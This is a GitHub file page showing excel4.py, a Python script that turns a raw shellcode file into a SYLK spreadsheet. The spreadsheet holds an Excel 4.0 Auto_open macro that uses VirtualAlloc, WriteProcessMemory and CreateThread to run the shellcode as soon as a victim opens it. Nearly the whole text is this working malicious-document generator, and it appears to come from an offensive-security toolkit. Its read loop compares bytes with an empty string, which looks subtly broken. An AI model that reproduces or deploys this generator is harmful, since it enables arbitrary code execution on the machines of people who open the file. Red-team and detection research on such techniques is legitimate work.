-
Notifications
You must be signed in to change notification settings - Fork 371
Expand file tree
/
Copy pathexcel4.py
More file actions
52 lines (46 loc) · 1.75 KB
/
excel4.py
File metadata and controls
52 lines (46 loc) · 1.75 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
import sys
# Some of this code is bastardised from code by @StanHacked
# For a breakdown of this technique I recommend watching
# http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
def bytes2int(byte):
return int.from_bytes(byte, byteorder='big')
SHELLCODE_HEADER = """ID;P
O;E
NN;NAuto_open;ER1C1;KSpreadsheet;F
C;X1;Y1;K0;ER1C2()
C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
C;X1;Y8;K0;ESELECT(, "R[1]C")
C;X1;Y9;K0;ENEXT()
C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
C;X1;Y11;K0;EHALT()
"""
def generate_slk(shellcode_path):
return build_shellcode_slk(shellcode_path)
def build_shellcode_slk(shellcode_path):
#print("[*] Building shellcode exec SLK")
slk_output = SHELLCODE_HEADER
with open(shellcode_path, "rb") as f:
byte = f.read(1)
i = 0
cell=0
while byte != "":
if i == 0:
cell=cell+1
slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
else:
slk_output+=("&")
slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
byte = f.read(1)
i+=1
if i == 20:
slk_output+=("\n")
i = 0
cell=cell+1
slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
return slk_output